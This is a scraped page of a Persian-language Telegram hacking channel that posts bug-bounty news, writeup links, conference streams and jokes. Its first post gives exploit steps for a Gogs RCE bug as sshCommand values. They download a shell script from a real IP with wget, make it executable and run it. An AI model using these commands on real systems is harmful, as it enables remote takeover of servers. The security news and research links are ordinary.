NEW BOT Телеграм, страница

Hack Haven

یدونه zero day برای Gogs اومده که خیلی بحاله بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده نیاز به یک یوزر عادی داره و No authentication نیست. https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit

exploit

-دانلود فایل اتکر:


sshCommand = wget http://106.53.108.81/123.sh -O /tmp/123.sh

بجای اینکه به گیت وصل شه فایل رو دانلود میکنه

executable کردن فایل-


sshCommand = chmod +x /tmp/123.sh

– اجرای شل


sshCommand = bash /tmp/123.sh

@hackhaven_new

❤5

1.26K viewsedited 08:15

Hack Haven

Forwarded from PentesterLand Academy - Public

این فقط یک رودمپ ساده یا یک نقشه راه برای مبتدیان نیست، بلکه یک راهنمای اصولی براساس سطح شحص است، فرقی نمیکنه تازه بخوای شروع کنی و ه.کر بشی یا نه حتی سابقه کار داری یا باگ هانتر هستی، این پیام اینده کاریت رو بهتر خواهد کرد
نظرت رو راجب این پست باهام مطرح کن ❤️‍🔥

فرقی نمیکنه بخوای مهاجرت کنی یا فریلنسری کار کنی این پست مطمئنم بخشی از نیازت رو برطرف میکنه

https://www.instagram.com/reel/DSPnPq3jXcL/?igsh=emRvbjU3ZTRjc2Np

Instagram

@pentesterland

❤11👎1

302 views12:51

Hack Haven

Account hijacking using “dirty dancing” in sign-in OAuth-flows: https://labs.detectify.com/writeups/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/

Labs Detectify

Account hijacking using "dirty dancing" in sign-in OAuth-flows

Combining response-type switching, invalid state and redirect-uri quirks using OAuth, with third-party javanoscript-inclusions has multiple vulnerable scenarios where authorization codes or tokens could leak to an attacker. This could be used in attacks for…

❤5

559 viewsedited 20:10

Hack Haven

Account hijacking using “dirty dancing” in sign-in OAuth-flows: https://labs.detectify.com/writeups/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/

پیشنهادی برای خوندن 📿

❤2

501 views20:12

Hack Haven

یوتیوب درآمد یوتیوبرای فارسی رو شدیدا کم کرده.
۴سالی بود میخواستم چنل یوتیوب بزنم تولید محتوا کنم‌.
خداروشکر دیگه عذاب وجدان ندارم که انجام ندادم.

🤣23

483 views09:09

Hack Haven

یوتیوب درآمد یوتیوبرای فارسی رو شدیدا کم کرده. ۴سالی بود میخواستم چنل یوتیوب بزنم تولید محتوا کنم‌. خداروشکر دیگه عذاب وجدان ندارم که انجام ندادم.

This media is not supported in your browser

VIEW IN TELEGRAM

517 views09:10

😁3🍓2

Hack Haven

Forwarded from 𝗔𝗺𝗲𝗿.𝗘𝗧𝗛 𝗫

0:32

🥰5🤣3

1.43K views05:44

Hack Haven

Voice message

اگه تارگتای ایرانی پول ندادن اینو براشون بفرستید.

🤣13

1.34K views05:45

Hack Haven

Hack Haven pinned Deleted message

06:24

Hack Haven

Forwarded from PentesterLand Academy - Public

بی پرده ترین، بی سانسور ترین
و کامل ترین حالت ممکن از یک رایتاپ اینجاست
شرح اسیب پذیری
ترکیبش با اسیب پذیری دیگر
و اینکه داپلیکیت شد ولی در نهایت با اینکه واقعا داپ بود، تبدیل به ده هزار دلار شد

دوس داشتی نشرش بده رفیق ❤️‍🔥

https://www.instagram.com/reel/DSXVKl7Doh0/?igsh=bHFtaGFqcDRhYzYz

Instagram

@pentesterland

⁨
اینبار دیگه متفاوته
وقتی محمدرضا گلزار میخواد بیاد به کمکم‌ولی قبل از اومدنش کار رو جمع میکنم 😉
بی پرده و سانسور گفتم چجوری صفر تبدیل به ده هزارتا

اگه به محتوای پیشرفته هک و امنیت به دید یک شغل حرفه ای علاقه داری یا میخوای بدونی باید به صورت عمومی حواست…

❤10

226 views12:48

Hack Haven

https://x.com/Rockpratapsingh/status/2000873854596735330

X (formerly Twitter)

Rock Pratap Singh (Rocksec)🇮🇳 (@Rockpratapsingh) on X

One of the best Best Approach for JS Analysis
https://t.co/Fw9LqYc6nt

❤1

372 views19:22

Hack Haven

Forwarded from GO-TO CVE

❤15

241 views19:38

Hack Haven

GitHub - hackerschoice/thc-tips-tricks-hacks-cheat-sheet: Various tips & tricks
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet

GitHub

GitHub - hackerschoice/thc-tips-tricks-hacks-cheat-sheet: Various tips & tricks

Various tips & tricks. Contribute to hackerschoice/thc-tips-tricks-hacks-cheat-sheet development by creating an account on GitHub.

❤7

459 views11:27

Hack Haven

https://www.youtube.com/watch?v=e0OFTgNSo6o

nahamcon

YouTube

NahamCon 2025 Winter Edition: Day 2

Welcome to NahamCon 2025 — Live Stream

🗓️ December 17–18
🌐 100% Virtual & Free
📍 Streaming right here on YouTube + Twitch.tv/NahamSec

NahamCon is a two-day security conference bringing together hackers and security researchers from around the world. Tune…

❤4

395 viewspooriya, 18:15

Hack Haven

https://neo.projectdiscovery.io/

neo.projectdiscovery.io

Neo - AI Security Engineer

The AI security engineer that executes complex and time-intensive tasks, enabling your team to scale operations and maintain continuous, proactive security.

❤4

397 viewsznuqv, 18:58

Hack Haven

https://jvns.ca/blog/2022/04/12/a-list-of-new-ish--command-line-tools/

https://github.com/ibraheemdev/modern-unix

دوتا سایت برای جایگزینی ابزارهای لینوکس

Julia Evans

A list of new(ish) command line tools

Hello! Today I asked on twitter about newer command line tools, like ripgrep and fd and fzf and exa and bat.

❤4

372 viewsznuqv, 19:54

Hack Haven

https://freedium-mirror.cfd/https://systemweakness.com/why-95-of-bug-bounty-hunters-quit-and-how-the-5-actually-make-money-730863b854d5

freedium-mirror.cfd

Why 95% of Bug Bounty Hunters Quit (And How the 5% Actually Make Money) | by BugHunter’s Journal - Freedium

You spent three months learning OWASP Top 10, completed 50+ PortSwigger labs, joined HackerOne...

❤7

387 viewspooriya, 08:44

Hack Haven

https://m.soundcloud.com/21savage/sets/what-happened-to-the-streets-1

SoundCloud

WHAT HAPPENED TO THE STREETS?

All Inquires Contact 21@21savage.com
#SavageMode #SlaughterGang

🔥5

469 viewspooriya, 10:55

Hack Haven

آمریکا اهدای گرین کارت
از طریق لاتاری را تعطیل کرد

دیگه نیاز نیست نیست منتظر جواب لاتاری باشیم

🔥12😢3👏1

445 viewspooriya, 11:40

Hack Haven

دیشب توی کنفرانس nahamcon یه نفر گفت ترکیب Jxscout با Gemeni cli خداست حتما استفاده کنید.

❤11

465 viewsznuqv, 12:42

RHYNORATER: Is it time to integrate AI as a Manual Hacker?

📌 @hackhaven_new

❤4👍1

427 viewsznuqv, edited 18:38

About

Blog

Apps

Platform